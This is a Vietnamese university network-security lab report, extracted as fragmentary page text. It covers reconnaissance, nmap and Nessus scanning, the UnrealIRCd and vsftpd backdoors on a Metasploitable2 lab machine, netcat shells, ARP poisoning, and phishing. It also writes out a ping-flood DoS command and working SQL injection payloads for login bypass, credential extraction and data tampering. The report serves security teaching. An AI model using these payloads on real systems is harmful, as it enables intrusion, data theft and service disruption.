- Cấu hình file scan trong Nessus - Kết quả scan máy victim bằng Nessus... - Kiểm tra xem đã thâm nhập vào máy victim hay chưa • Kết quả lệnh ifconfig trùng với ip của máy victim... o Ph
Trang 1HỌC VIỆN CÔNG NGHỆ BƯU CHÍNH VIỄN THÔNG
BÁO CÁO THỰC HÀNH
AN TOÀN MẠNG BÀI THỰC HÀNH SỐ 2
Giảng viên hướng dẫn: TS Đặng Minh Tuấn
Trang 2MỤC LỤC
BÀI 1: FOOTPRINT 1
BÀI 2: SCANNING 7
BÀI 3: SYSTEM HACKING 21
BÀI 4: TROJAN VÀ BACKDOOR 23
BÀI 5: CÁC PHƯƠNG PHÁP SNIFFER 24
BÀI 6: TẤN CÔNG TỪ CHỐI DỊCH VỤ DOS 25
BÀI 7: SOCIAL ENGINEERING 25
BÀI 8: HACKING WEB SERVER 27
BÀI 9: WEB APPLICATION HACKING 28
BÀI 10: SQL INJECTION 29
BÀI 11: BUFFER OVERFLOW 39
BÀI 1: FOOTPRINT
I Tìm thông tin về domain
- Tìm kiếm thông tin về domain itvietnam.com sử dụng trang web
https://who.is/
Trang 4- Tra cứu thông tin domain google.com sử dụng trang web
https://whois.domaintools.com/
Trang 7II Tìm thông tin email
http://www.123hiddensender.com)
- Keyword: vnn.vn
Trang 8
BÀI 2: SCANNING
I Sử dụng phần mềm nmap
- Lấy thông tin từ máy từ xa và xác định hệ điều hành của máy
• nmap -sS -P0 -sV -O <target>
Trang 10Lấy danh sách các máy chủ với các cổng mở được định nghĩa trước
• nmap -p 135 -oG – 192.168.1.5
• nmap -p 445 -oG – 192.168.1.5
Trang 14
-
- Cấu hình mạng máy Kali Linux
Trang 15
-
Lệnh ping từ Kali Linux sang máy victim
- Lệnh ping từ máy victim sang Kali Linux
Trang 16
-
Cấu hình file scan trong Nessus
- Kết quả scan máy victim bằng Nessus
Trang 17
-
Trang 18 Khai thác backdoor unrealIRCd (port 6667)
UnrealIRCd là máy chủ nhắn tin hoạt động dựa trên giao thức IRC trên cổng TCP 6667
UnrealIRCd tồn tại một cửa hậu sau một thời gian dài không mới bị phát hiện Cửa hậu mở ra khi nhận được chuỗi ký tự “AB” kèm theo 1 lệnh shell hệ
- Bắt đầu khai thác
Trang 19- Kiểm tra xem đã thâm nhập vào máy victim hay chưa
• Kết quả lệnh ifconfig trùng với ip của máy victim
Trang 21• Kiểm tra hostname
Trang 22
1
BÀI 3: SYSTEM HACKING
Trang 23
1
Dùng Cain để brute-force mật khẩu
Trang 24
1
BÀI 4: TROJAN VÀ BACKDOOR
Sử dụng netcat để kết nối shell
Trang 25
1
BÀI 5: CÁC PHƯƠNG PHÁP SNIFFER
Sử dụng Etercap để tấn công ARP Poisoning
Trang 26
1
BÀI 6: TẤN CÔNG TỪ CHỐI DỊCH VỤ DOS
Dùng lệnh "For /L %i in (1,1,100) do start ping [ip victim] -l 10000 -t" trên cmd
BÀI 7: SOCIAL ENGINEERING Gửi tin bằng email giả mạo có đính kèm link chứa mã độc
Trang 27
1
Trang 28
BÀI 8: HACKING WEB SERVER
- Cấu hình mạng máy victim (Metasploitable2)
- Cấu hình mạng máy Kali Linux
- Khai thác backdoor Vsftpd v2.3.4 (port 6200)
Trang 29
BÀI 9: WEB APPLICATION HACKING
1 XSS Stored
Trang 30BÀI 10: SQL INJECTION
1 Vượt qua khâu xác thực người dùng
- Chi tiết file login_error.txt
Trang 31- Nhập dữ liệu cho phép đăng nhập mà không cần có đủ username và
password:
Trang 32
o Phân tích câu lệnh SQL được thực hiện (hiển thị trên trang) và giải thích kết quả có
được
Câu lệnh 1 sẽ lấy bản ghi đầu tiên trong bảng tbl_users với username = ‘aaaa’ or 1=1 –’ và password = ‘today’ Kết quả đăng nhập thành công với tài khoản người dùng đầu tiên trong danh sách
Trang 33 Câu lệnh 2 sẽ lấy bản ghi đầu tiên trong bảng tbl_users với username = ‘david –’ và password = ‘today’ Kết quả đăng nhập
sẽ thành công với tài khoản người dùng david nếu tồn tại tài khoản với user này
2 Trích xuất dữ liệu từ CSDL
- Chi tiết file search_error.txt
Trang 34
o sam%’ union select <danh sách trường thử>;
- Hiển thị thông tin hệ quản trị CSDL và hệ điều hành o ssss' union select '',
@@version, 0
Trang 35- Trích xuất danh sách các bảng của CSDL o ssss' union select '', name, 0
from sys.objects where type='u';
- Trích xuất danh sách các trường của một bảng o ssss' union select '',
a.name, 0 from sys.columns a inner join sys.objects b on a.object_id =
b.object_id where b.name='tbl_users';
Trang 36o Thay tên bảng tbl_users bằng bảng khác có được ở mục trên để hiển thị danh sách
các trường của bảng đó
Trang 37- Trích xuất dữ liệu bảng o ssss' union select full_name,
username+' '+password, 0 from tbl_users;
Trang 38o Thay tên bảng và danh sách trường để trích xuất dữ liệu của các bảng khác có được ở mục trên
viên trùng với mã sv của mình và hiển thị toàn bộ thông tin trích xuất được lên màn hình
Trang 393 Thêm, sửa, xoá dữ liệu
- samsung'; update tbl_users set password='lostmypassword' where
username='david';
- samsung'; insert into tbl_users (full_name, username, password) values
('GiantB', 'giant_bee', 'conongratto');
Trang 40- samsung'; delete from tbl_users where username = 'giant_bee';
BÀI 11: BUFFER OVERFLOW